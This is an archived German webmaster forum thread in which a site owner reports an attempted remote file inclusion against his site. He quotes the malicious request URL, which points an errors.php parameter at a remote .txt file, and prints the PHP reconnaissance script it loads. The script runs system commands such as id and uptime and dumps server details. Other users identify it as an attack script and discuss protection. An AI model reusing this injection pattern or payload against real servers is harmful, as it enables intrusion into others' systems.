Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Brandaktuell: Seite hacken oder Links einschleusen?

Forum rund um das Thema Hardware für Webmaster.
Neues Thema Antworten
euroexchange.de
PostRank 6
PostRank 6
Beiträge: 471
Registriert: 02.06.2007, 13:49

Beitrag von euroexchange.de » 16.09.2009, 00:34

echo "chitoz was here ..<br>";

Gerade fallen mir auf meiner Seite einige seltsame Bewegungen auf.

Eine merkmürdige URL die so nicht auf meiner Seite vorkommt lautet:

EigeneURL.de/errors.php?error=https://www.saskatoonhomepage.ca//components/idggg.txt???

Wobei EigeneURL lediglich beispielhaft ist.

Unter der angehängten URL:

https://www.saskatoonhomepage.ca//components/idggg.txt???

befindet sich ein Skript welches wohl versucht PHP in meine Seite einzuschleusen.

Das Skript sieht so aus:


Jemand eine Idee?

Code: Alles auswählen

<?php
function ConvertBytes&#40;$number&#41;
&#123;
        $len = strlen&#40;$number&#41;;
        if&#40;$len < 4&#41;
        &#123;
                return sprintf&#40;"%d b", $number&#41;;
        &#125;
        if&#40;$len >= 4 && $len <=6&#41;
        &#123;
                return sprintf&#40;"%0.2f Kb", $number/1024&#41;;
        &#125;
        if&#40;$len >= 7 && $len <=9&#41;
        &#123;
                return sprintf&#40;"%0.2f Mb", $number/1024/1024&#41;;
        &#125;
   
        return sprintf&#40;"%0.2f Gb", $number/1024/1024/1024&#41;;
                           
&#125;

echo "chitoz<br>";
$un = @php_uname&#40;&#41;;
$up = system&#40;uptime&#41;;
$id1 = system&#40;id&#41;;
$pwd1 = @getcwd&#40;&#41;;
$sof1 = getenv&#40;"SERVER_SOFTWARE"&#41;;
$php1 = phpversion&#40;&#41;;
$name1 = $_SERVER&#91;'SERVER_NAME'&#93;;
$ip1 = gethostbyname&#40;$SERVER_ADDR&#41;;
$free1= diskfreespace&#40;$pwd1&#41;;
$free = ConvertBytes&#40;diskfreespace&#40;$pwd1&#41;&#41;;
if &#40;!$free&#41; &#123;$free = 0;&#125;
$all1= disk_total_space&#40;$pwd1&#41;;
$all = ConvertBytes&#40;disk_total_space&#40;$pwd1&#41;&#41;;
if &#40;!$all&#41; &#123;$all = 0;&#125;
$used = ConvertBytes&#40;$all1-$free1&#41;;
$os = @PHP_OS;


echo "chitoz was here ..<br>";
echo "uname -a&#58; $un<br>";
echo "os&#58; $os<br>";
echo "uptime&#58; $up<br>";
echo "id&#58; $id1<br>";
echo "pwd&#58; $pwd1<br>";
echo "php&#58; $php1<br>";
echo "software&#58; $sof1<br>";
echo "server-name&#58; $name1<br>";
echo "server-ip&#58; $ip1<br>";
echo "free&#58; $free<br>";
echo "used&#58; $used<br>";
echo "total&#58; $all<br>";
exit;
Zuletzt geändert von euroexchange.de am 16.09.2009, 00:40, insgesamt 1-mal geändert.

Anzeige von ABAKUS

von Anzeige von ABAKUS »


Hochwertiger Linkaufbau bei ABAKUS:
  • Google-konformer Linkaufbau
  • nachhaltiges Ranking
  • Linkbuilding Angebote zu fairen Preisen
  • internationale Backlinks
Wir bieten Beratung und Umsetzung.
Jetzt anfragen: 0511 / 300325-0

mgutt
PostRank 10
PostRank 10
Beiträge: 3206
Registriert: 08.03.2005, 13:13

Beitrag von mgutt » 16.09.2009, 00:40

Das sind Attackscripte. Mit den Daten kann der Hacker dann weiter arbeiten. Aber solche Angriffe bzw. ich nenn es mal "Versuche" sind völlig normal.
Ich kaufe Dein Forum!
Kontaktdaten

euroexchange.de
PostRank 6
PostRank 6
Beiträge: 471
Registriert: 02.06.2007, 13:49

Beitrag von euroexchange.de » 16.09.2009, 00:49

Ist das richtige setzen von Verzeichnis- und Dateirechten sowie das evtl. einbringen einer leeren index.html in jedes Verzeichnis Schutz genug?